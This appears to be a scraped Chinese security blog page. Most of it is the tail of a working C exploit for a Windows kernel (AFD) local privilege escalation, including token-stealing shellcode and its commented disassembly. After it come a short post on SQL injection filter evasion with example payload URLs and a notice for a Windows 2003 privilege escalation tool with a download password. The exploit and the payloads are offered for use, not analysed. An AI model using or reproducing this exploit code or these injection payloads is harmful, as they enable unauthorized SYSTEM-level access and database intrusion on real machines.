        if((pBuffer = malloc(Byte)) == NULL)
                ErrorQuit("malloc failed.\n");

        if(ZwQuerySystemInformation(SystemModuleInformation, pBuffer, Byte, &Byte))
                ErrorQuit("ZwQuerySystemInformation failed\n");

        ModuleCount = *(PULONG)pBuffer;
        pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)((PUCHAR)pBuffer + sizeof(ULONG));
        for(i = 0; i < ModuleCount; i++)
        {
                if((pName = strstr(pSystemModuleInformation->ImageName, "ntoskrnl.exe")) != NULL)
                {
                        KernelBase = (ULONG)pSystemModuleInformation->Base;
                        printf("Kernel is %s\n", pSystemModuleInformation->ImageName);
                        free(pBuffer);
                        strcpy(KernelName, "ntoskrnl.exe");

                        return KernelBase;
                }

                if((pName = strstr(pSystemModuleInformation->ImageName, "ntkrnlpa.exe")) != NULL)
                {
                        KernelBase = (ULONG)pSystemModuleInformation->Base;
                        printf("Kernel is %s\n", pSystemModuleInformation->ImageName);
                        free(pBuffer);
                        strcpy(KernelName, "ntkrnlpa.exe");

                        return KernelBase;
                }

                pSystemModuleInformation++;
        }

        free(pBuffer);
        return 0;
}

ULONG GetServiceTable(PVOID pImageBase, ULONG Address)
{
        PIMAGE_NT_HEADERS        pNtHeaders;
        PIMAGE_BASE_RELOCATION        pBaseRelocation;
        PIMAGE_FIXUP_ENTRY        pFixupEntry;
        ULONG        RelocationTableSize = 0;
        ULONG        Offset, i, VirtualAddress, Rva;

        Offset = Address - (ULONG)pImageBase;
        pNtHeaders = (PIMAGE_NT_HEADERS)RtlImageNtHeader(pImageBase);
        pBaseRelocation = (PIMAGE_BASE_RELOCATION)RtlImageDirectoryEntryToData(pImageBase, TRUE, IMAGE_DIRECTORY_ENTRY_BASERELOC, &RelocationTableSize);
        if(pBaseRelocation == NULL)
                return 0;

        do
        {
                pFixupEntry = (PIMAGE_FIXUP_ENTRY)((ULONG)pBaseRelocation + sizeof(IMAGE_BASE_RELOCATION));

                RelocationTableSize = (pBaseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) >> 1;
                for(i = 0; i < RelocationTableSize; i++, pFixupEntry++)
                {
                        if(pFixupEntry->Type == IMAGE_REL_BASED_HIGHLOW)
                        {
                                VirtualAddress = pBaseRelocation->VirtualAddress + pFixupEntry->Offset;
                                Rva = *(PULONG)((ULONG)pImageBase + VirtualAddress) - (ULONG)pNtHeaders->OptionalHeader.ImageBase;

                                if(Rva == Offset)
                                {
                                   if (*(PUSHORT)((ULONG)pImageBase + VirtualAddress - 2) == 0x05c7)
                                                return *(PULONG)((ULONG)pImageBase + VirtualAddress + 4) - pNtHeaders->OptionalHeader.ImageBase;
                                }
                        }
                }

                *(PULONG)&pBaseRelocation += pBaseRelocation->SizeOfBlock;

        } while(pBaseRelocation->VirtualAddress);

        return 0;
}

int main(int argc, char* argv[])
{
        PVOID                pDrivers[256];
        PVOID                pOldKernelInfo, pMapAddress = NULL;
        PULONG        pStoreBuffer, pShellcode, pFakeKernelInfo;
        PUCHAR        pRestoreBuffer, pBase, FunctionAddress;
        PROCESS_BASIC_INFORMATION pbi;
        SYSTEM_MODULE_INFORMATION        smi;
        SECTION_BASIC_INFORMATION sbi;
        KPROFILE_SOURCE        ProfileSource;
        OSVERSIONINFO        ovi;
        char                DriverName[256], KernelName[64];
        ULONG                Byte, len, i, j, k, BaseAddress, Value, KernelBase, buf[64];
        ULONG                HookAddress, SystemId, TokenOffset, Sections, Pid, FunctionNumber;
        ULONG                HDTOffset, AllocationSize;
        ULONG                Result;
        HANDLE        hKernel;
        WSADATA        wsad;
        int                sockfd;
        struct sockaddr_in saddr;


        printf("\n MS08-0xx Windows Kernel Ancillary Function Driver Local Privilege Escalation Vulnerability Exploit \n\n");
        printf("\t Create by SoBeIt. \n\n");
        if(argc != 1)
        {
                printf(" Usage:%s\n\n", argv[0]);
                return 1;
        }

        pFakeKernelInfo = (PULONG)malloc(256);

        GetFunction();

        if(ZwQueryInformationProcess(GetCurrentProcess(), ProcessBasicInformation, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL))
                ErrorQuit("ZwQueryInformationProcess failed\n");

        KernelBase = GetKernelBase(KernelName);
        if(!KernelBase)
                ErrorQuit("Unable to get kernel base address.\n");

        printf("Kernel base address: %x\n", KernelBase);

        ovi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

        if(!GetVersionEx(&ovi))
                ErrorQuit("GetVersionEx failed.\n");

        if(ovi.dwMajorVersion != 5 && ovi.dwMajorVersion != 6)
                ErrorQuit("Not Windows NT family OS.\n");

        printf("Major Version:%d Minor Version:%d\n", ovi.dwMajorVersion, ovi.dwMinorVersion);
        switch(ovi.dwMinorVersion)
        {
                case 0:                                                //Windows2000
                        SystemId = 8;
                        TokenOffset = 0x12c;
                        break;

                case 1:                                                //WindowsXP
                        SystemId = 4;
                        TokenOffset = 0xc8;
                        break;

                case 2:                                                //Windows2003
                        SystemId = 4;
                        TokenOffset = 0xd8;
                        break;

                default:
                        SystemId = 4;
                        TokenOffset = 0xc8;
        }

        hKernel = LoadLibrary(KernelName);
        if(hKernel == NULL)
                ErrorQuit("LoadLibrary failed.\n");

        printf("Load Base:%x\n", (ULONG)hKernel);
        HDTOffset = (ULONG)GetProcAddress(hKernel, "HalDispatchTable");
        HDTOffset += KernelBase - (ULONG)hKernel;
        printf("HalDispatchTable Offset:%x\n", HDTOffset);
        HookAddress = (ULONG)(HDTOffset + 4);
        printf("NtQueryIntervalProfile function entry address:%x\n", HookAddress);

        AllocationSize = 0x1000;
        pStoreBuffer = (PULONG)0x7fb0;
        if(ZwAllocateVirtualMemory((HANDLE)0xffffffff, &pStoreBuffer, 0, &AllocationSize,
                                        MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE))
                ErrorQuit("ZwAllocateVirtualMemory failed.\n");

        pRestoreBuffer = malloc(0x100);

        memset(pStoreBuffer, 0x90, AllocationSize);

        pShellcode = (PULONG)shellcode;
        for(k = 0; pShellcode[k++] != 0x90cccc90; )
                                ;

        for(j = 0; kfunctions[j][0] != '\x0'; j++)
                buf[j] = ComputeHash(kfunctions[j]);

        buf[j++] = pbi.InheritedFromUniqueProcessId;
        buf[j++] = SystemId;
        buf[j++] = (ULONG)pRestoreBuffer;
        buf[j++] = HookAddress;
        buf[j++] = 0x04;
        buf[j++] = TokenOffset;

        memcpy((char *)(pShellcode + k), (char *)buf, j * 4);
        memcpy((PUCHAR)0x8000, shellcode, sizeof(shellcode) - 1);

        if(WSAStartup(MAKEWORD(2, 2), &wsad) != 0)
                ErrorQuit("WSAStartup failed.\n");

        if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
                ErrorQuit("socket failed.\n");

        saddr.sin_family = AF_INET;
        saddr.sin_port = htons(0x1bd);
        saddr.sin_addr.s_addr = 0x100007f;

        if(connect(sockfd, (struct sockaddr *)&saddr, sizeof(struct sockaddr)))
                ErrorQuit("connect failed.\n");

        DeviceIoControl((HANDLE)sockfd, 0x1203F, NULL, 0, (PVOID)(HookAddress - 3), 0, &Result, NULL);

        ProfileSource = ProfileTotalIssues;
        ZwQueryIntervalProfile(ProfileSource, &Result);

        printf("Exploit finished.\n");
        return 1;
}

/*Comment by friddy
shellcode ASM:
00422330 90                   nop
00422331 60                   pushad
00422332 9C                   pushfd
00422333 E9 C4 00 00 00       jmp         friddy+0CCh (004223fc)
00422338 5F                   pop         edi
00422339 4F                   dec         edi
0042233A 47                   inc         edi
0042233B 66 81 3F 90 CC       cmp         word ptr [edi],offset friddy+0Eh (0042233e)
00422340 75 F8                jne         friddy+0Ah (0042233a)
00422342 66 81 7F 02 CC 90    cmp         word ptr [edi+2],offset friddy+16h (00422346)
00422348 75 F0                jne         friddy+0Ah (0042233a)
0042234A 83 C7 04             add         edi,4
0042234D 64 8B 35 38 00 00 00 mov         esi,dword ptr fs:[38h]
00422354 AD                   lods        dword ptr [esi]
00422355 AD                   lods        dword ptr [esi]
00422356 48                   dec         eax
00422357 81 38 4D 5A 90 00    cmp         dword ptr [eax],905A4Dh
0042235D 75 F7                jne         friddy+26h (00422356)
0042235F 95                   xchg        eax,ebp
00422360 8B F7                mov         esi,edi
00422362 6A 02                push        2
00422364 59                   pop         ecx
00422365 E8 4D 00 00 00       call        friddy+87h (004223b7)
0042236A E2 F9                loop        friddy+35h (00422365)
0042236C 8B 4E 0C             mov         ecx,dword ptr [esi+0Ch]
0042236F E8 29 00 00 00       call        friddy+6Dh (0042239d)
00422374 50                   push        eax
00422375 8B 4E 08             mov         ecx,dword ptr [esi+8]
00422378 E8 20 00 00 00       call        friddy+6Dh (0042239d)
0042237D 5A                   pop         edx
0042237E 8B 7E 1C             mov         edi,dword ptr [esi+1Ch]
00422381 8B 0C 3A             mov         ecx,dword ptr [edx+edi]
00422384 89 0C 38             mov         dword ptr [eax+edi],ecx
00422387 56                   push        esi
00422388 8B 7E 14             mov         edi,dword ptr [esi+14h]
0042238B 8B 4E 18             mov         ecx,dword ptr [esi+18h]
0042238E 8B 76 10             mov         esi,dword ptr [esi+10h]
00422391 F3 A4                rep movs    byte ptr [edi],byte ptr [esi]
00422393 5E                   pop         esi
00422394 33 C0                xor         eax,eax
00422396 50                   push        eax
00422397 50                   push        eax
00422398 FF 16                call        dword ptr [esi]
0042239A 9D                   popfd
0042239B 61                   popad
0042239C C3                   ret
0042239D 83 EC 04             sub         esp,4
004223A0 8D 2C 24             lea         ebp,[esp]
004223A3 55                   push        ebp
004223A4 51                   push        ecx
004223A5 FF 56 04             call        dword ptr [esi+4]
004223A8 85 C0                test        eax,eax
004223AA 0F 85 80 8F 00 00    jne         0042B330
004223B0 8B 45 00             mov         eax,dword ptr [ebp]
004223B3 83 C4 04             add         esp,4
004223B6 C3                   ret
004223B7 51                   push        ecx
004223B8 56                   push        esi
004223B9 8B 75 3C             mov         esi,dword ptr [ebp+3Ch]
004223BC 8B 74 2E 78          mov         esi,dword ptr [esi+ebp+78h]
004223C0 03 F5                add         esi,ebp
004223C2 56                   push        esi
004223C3 8B 76 20             mov         esi,dword ptr [esi+20h]
004223C6 03 F5                add         esi,ebp
004223C8 33 C9                xor         ecx,ecx
004223CA 49                   dec         ecx
004223CB 41                   inc         ecx
004223CC AD                   lods        dword ptr [esi]
004223CD 03 C5                add         eax,ebp
004223CF 33 DB                xor         ebx,ebx
004223D1 0F BE 10             movsx       edx,byte ptr [eax]
004223D4 85 D2                test        edx,edx
004223D6 74 08                je          friddy+0B0h (004223e0)
004223D8 C1 CB 07             ror         ebx,7
004223DB 03 DA                add         ebx,edx
004223DD 40                   inc         eax
004223DE EB F1                jmp         friddy+0A1h (004223d1)
004223E0 3B 1F                cmp         ebx,dword ptr [edi]
004223E2 75 E7                jne         friddy+9Bh (004223cb)
004223E4 5E                   pop         esi
004223E5 8B 5E 24             mov         ebx,dword ptr [esi+24h]
004223E8 03 DD                add         ebx,ebp
004223EA 66 8B 0C 4B          mov         cx,word ptr [ebx+ecx*2]
004223EE 8B 5E 1C             mov         ebx,dword ptr [esi+1Ch]
004223F1 03 DD                add         ebx,ebp
004223F3 8B 04 8B             mov         eax,dword ptr [ebx+ecx*4]
004223F6 03 C5                add         eax,ebp
004223F8 AB                   stos        dword ptr [edi]
004223F9 5E                   pop         esi
004223FA 59                   pop         ecx
004223FB C3                   ret
004223FC E8 37 FF FF FF       call        friddy+8 (00422338)
00422401 90                   nop
00422402 90                   nop
00422403 90                   nop
00422404 90                   nop
00422405 CC                   int         3
00422406 CC                   int         3
00422407 90                   nop
00422408 90                   nop
00422409 90                   nop
0042240A 90                   nop
0042240B 90                   nop
0042240C 90                   nop
0042240D 90                   nop
0042240E 90                   nop
0042240F 90                   nop
00422410 90                   nop
00422411 90                   nop
00422412 90                   nop
00422413 90                   nop
00422414 90                   nop
00422415 90                   nop
00422416 90                   nop
00422417 90                   nop
00422418 90                   nop
00422419 90                   nop
0042241A 90                   nop
0042241B 90                   nop
0042241C 90                   nop
0042241D 90                   nop
0042241E 90                   nop
0042241F 90                   nop
00422420 90                   nop
00422421 90                   nop
00422422 90                   nop
00422423 90                   nop
00422424 90                   nop
00422425 90                   nop
00422426 90                   nop
00422427 90                   nop
00422428 90                   nop
00422429 90                   nop
0042242A 90                   nop
0042242B 90                   nop
0042242C 90                   nop
0042242D 90                   nop
0042242E 90                   nop
0042242F 90                   nop
00422430 CC                   int         3
00422431 90                   nop
00422432 90                   nop
00422433 CC                   int         3
*/

SQL注入中可以替换空格的字符

2008-10-13T13:13:44+08:00

默认是：
http://www.xxx.com/shownotice.asp?id=78 and 1=1
实际上用%09 %0A %0D +都可以替代空格
例如：
http://www.xxx.com/shownotice.asp?id=78%09and%091=1
http://www.xxx.com/shownotice.asp?id=78%0Aand%0A1=1
http://www.xxx.com/shownotice.asp?id=78%0Dand%0D1=1
http://www.xxx.com/shownotice.asp?id=78%+and+1=1

以下可以在SQLServer2000下可以替换%01到%20都可以
http://www.xxx.com/shownotice.asp?id=78%19and%191=1

Windows 2003权限提升漏洞

2008-10-09T17:47:48+08:00

要求：2003+asp.net+wscript

##不提供下载##

刑法第２８５条规定，违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。

刑法修正案（七）在刑法第２８５条中增加两款（第二款、第三款）：

“违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。”

“提供专门用于侵入、非法控制计算机信息系统的程序、工具，或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具，情节严重的，依照前款的规定处罚。”

下载地址：
点击下载此文件

解压缩密码：friddy